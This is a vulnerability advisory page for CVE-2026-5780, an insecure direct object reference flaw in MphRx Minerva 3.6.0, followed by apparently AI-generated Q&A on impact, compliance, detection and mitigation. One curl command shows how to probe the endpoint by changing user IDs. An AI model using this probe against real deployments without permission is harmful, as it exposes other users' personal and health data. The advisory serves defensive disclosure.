CVE-2026-5780
IDOR Vulnerability in MphRx Minerva V3.6.0 Enables User Data Exposure
Publication date: 2026-04-28
Last updated on: 2026-05-05
Assigner: Spanish National Cybersecurity Institute, S.A. (INCIBE)
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| agilonhealth | minerva | 3.6.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5780 is an insecure direct object reference (IDOR) vulnerability found in MphRx's Minerva version 3.6.0. It specifically affects the endpoint `/minerva/moUser/show/<ID>`. This flaw allows an authenticated user to access data of other registered users by simply changing the user ID in the request URL.
By exploiting this vulnerability, an attacker can retrieve a list of users and their associated data without proper authorization, bypassing access controls.
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of sensitive user information. An attacker who is authenticated can access other users' data by modifying the user ID in requests, potentially exposing personal or confidential information.
Such unauthorized access can compromise user privacy, damage trust, and may lead to further exploitation depending on the nature of the exposed data.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an authenticated user to access data of other registered users without proper authorization by modifying the user ID. This improper access control can lead to unauthorized disclosure of personal or sensitive information.
Such unauthorized access to user data can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require strict controls to protect personal and health information from unauthorized access and disclosure.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the endpoint `/minerva/moUser/show/<ID>` for insecure direct object references. Specifically, an authenticated user can attempt to modify the user ID in the request URL to access data of other users.
A practical approach is to use HTTP request tools such as curl or Postman to send authenticated requests to the endpoint with different user IDs and observe if data from other users is returned.
- Example curl command to test the vulnerability (replace <TOKEN> with a valid authentication token and <ID> with different user IDs):
- curl -H "Authorization: Bearer <TOKEN>" https://<target-domain>/minerva/moUser/show/<ID>
If changing the <ID> in the URL returns data for other users without proper authorization errors, the vulnerability is present.
What immediate steps should I take to mitigate this vulnerability?
No official solution or patch has been reported yet for this vulnerability.
Immediate mitigation steps include:
- Restrict access to the vulnerable endpoint `/minerva/moUser/show/<ID>` to only highly trusted users or administrators.
- Implement additional access control checks on the server side to ensure that users can only access their own data.
- Monitor and log access to the endpoint to detect any suspicious activity or unauthorized access attempts.
- Consider temporarily disabling the endpoint if possible until a patch or fix is available.